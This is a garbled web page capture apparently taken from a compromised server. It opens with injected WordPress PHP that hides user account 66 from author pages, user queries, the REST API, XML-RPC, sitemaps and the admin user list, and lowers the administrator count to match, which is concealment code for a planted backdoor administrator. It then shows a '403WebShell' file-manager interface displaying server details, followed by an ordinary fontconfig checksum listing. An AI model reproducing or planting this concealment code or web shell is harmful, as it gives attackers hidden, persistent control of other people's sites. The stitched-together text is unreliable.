add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/fontconfig-config.md5sums
f40e8f5f5cfece0d73bf3737ff492e94  usr/share/doc/fontconfig-config/changelog.Debian.gz
4648df9e8d6215ae7dd16ce863b16967  usr/share/doc/fontconfig-config/copyright
3afa30c28051ba4ceb3e1979fc460bee  usr/share/fontconfig/conf.avail/05-reset-dirs-sample.conf
4e7985a85a60dad1b44aee2f418eaa0c  usr/share/fontconfig/conf.avail/09-autohint-if-no-hinting.conf
a7001cead7c337fa02359926c4d71dfa  usr/share/fontconfig/conf.avail/10-autohint.conf
d7bed3a1b6716b8d87c528bd7db0e59e  usr/share/fontconfig/conf.avail/10-hinting-full.conf
fa8777b5ef1afba5d935f3b6475a03c7  usr/share/fontconfig/conf.avail/10-hinting-medium.conf
8fdd0076e7874521576de0ede438ad0b  usr/share/fontconfig/conf.avail/10-hinting-none.conf
5da52d777c5af2cb4b7445b81ead6c3d  usr/share/fontconfig/conf.avail/10-hinting-slight.conf
abc0049fafa172cef7723547b8984c02  usr/share/fontconfig/conf.avail/10-no-antialias.conf
8588f87eaf68a1eb73920066f6817b48  usr/share/fontconfig/conf.avail/10-scale-bitmap-fonts.conf
1e33def77f5a7a289d240b903d669561  usr/share/fontconfig/conf.avail/10-sub-pixel-bgr.conf
3b917873967397433a44ddff38568ce8  usr/share/fontconfig/conf.avail/10-sub-pixel-none.conf
e58e3be3a96cfa19b6cc53f27845e65a  usr/share/fontconfig/conf.avail/10-sub-pixel-rgb.conf
b889df9e6b61c11ad86f906a4bf2450a  usr/share/fontconfig/conf.avail/10-sub-pixel-vbgr.conf
2b863fb3d17c36dfbe7f496dc9c73107  usr/share/fontconfig/conf.avail/10-sub-pixel-vrgb.conf
67a28bdc6fd1289bd6eb22de56516fae  usr/share/fontconfig/conf.avail/10-unhinted.conf
908d9e324c24bf809448ca7041db580b  usr/share/fontconfig/conf.avail/10-yes-antialias.conf
4dd5ffa8e7c3448e76fe1bbe2f3df871  usr/share/fontconfig/conf.avail/11-lcdfilter-default.conf
103cccfe6ec9df81d344fe010ad4f002  usr/share/fontconfig/conf.avail/11-lcdfilter-legacy.conf
93991270f397bea2c965a8c97a0fa50e  usr/share/fontconfig/conf.avail/11-lcdfilter-light.conf
14bfee2c9133a47870592d2deb251121  usr/share/fontconfig/conf.avail/11-lcdfilter-none.conf
535df1a3aed553ced27e176639e4b541  usr/share/fontconfig/conf.avail/20-unhint-small-vera.conf
99badbcb331e7195fe0f66430413375f  usr/share/fontconfig/conf.avail/25-unhint-nonlatin.conf
1eefbc368808e53dc9ab1b73aa300d99  usr/share/fontconfig/conf.avail/30-metric-aliases.conf
13c14c535be2ab65b8e01d4d2fc008d0  usr/share/fontconfig/conf.avail/35-lang-normalize.conf
c3cf056712b96dbef771f29c6b1d0655  usr/share/fontconfig/conf.avail/40-nonlatin.conf
6eb7544e52701729de1bc87c7e03b155  usr/share/fontconfig/conf.avail/45-generic.conf
d065b45633b306b895b0d582b8898eda  usr/share/fontconfig/conf.avail/45-latin.conf
9ef1b86cdc752b8765d2d1531e799cc1  usr/share/fontconfig/conf.avail/48-spacing.conf
fb5873c73e8ea39848ffb07a8d87d8cb  usr/share/fontconfig/conf.avail/49-sansserif.conf
acde2cbca39bb6261deea4e6e4bf597e  usr/share/fontconfig/conf.avail/50-user.conf
99b54670882634722fada39c78a39863  usr/share/fontconfig/conf.avail/51-local.conf
94669e241a96e50d95cdd4b126e43ec6  usr/share/fontconfig/conf.avail/53-monospace-lcd-filter.conf
381ad51b6c9a0c578c7176ae47481985  usr/share/fontconfig/conf.avail/60-generic.conf
182762526473419bda2ad5569bbfafbe  usr/share/fontconfig/conf.avail/60-latin.conf
b04584ac948140f0c6af958b87f0a734  usr/share/fontconfig/conf.avail/65-fonts-persian.conf
b1c4fab66d44c99bfaf07ca5719fe645  usr/share/fontconfig/conf.avail/65-khmer.conf
ff69c94438d017791d2e7fd9a0e63d2f  usr/share/fontconfig/conf.avail/65-nonlatin.conf
50c85de35a0dc211f7222ae974df7f3a  usr/share/fontconfig/conf.avail/69-unifont.conf
8be6061388b1798b7fda0b350613a552  usr/share/fontconfig/conf.avail/70-force-bitmaps.conf
5fd68931d975d91e9942218876262763  usr/share/fontconfig/conf.avail/70-no-bitmaps-and-emoji.conf
c5154b3dbb8815e1c2f9c5db42149218  usr/share/fontconfig/conf.avail/70-no-bitmaps-except-emoji.conf
690bb6cb34c4a3e86abecb5e1717e230  usr/share/fontconfig/conf.avail/70-no-bitmaps.conf
91c414090c7d8bfe557785fe845cb6bd  usr/share/fontconfig/conf.avail/70-yes-bitmaps.conf
bf3e2f77fdab77b46f9f793dcfa267f8  usr/share/fontconfig/conf.avail/80-delicious.conf
3202b57ed004b0828d6e2e70f56d951d  usr/share/fontconfig/conf.avail/90-synthetic.conf
fb21de5dda6ff56a244cd11104c5dcfa  usr/share/man/man5/fonts-conf.5.gz
2c84e0b58247e55e588812313b545636  usr/share/xml/fontconfig/fonts.dtd

Youez - 2016 - github.com/yon3zu
LinuXploit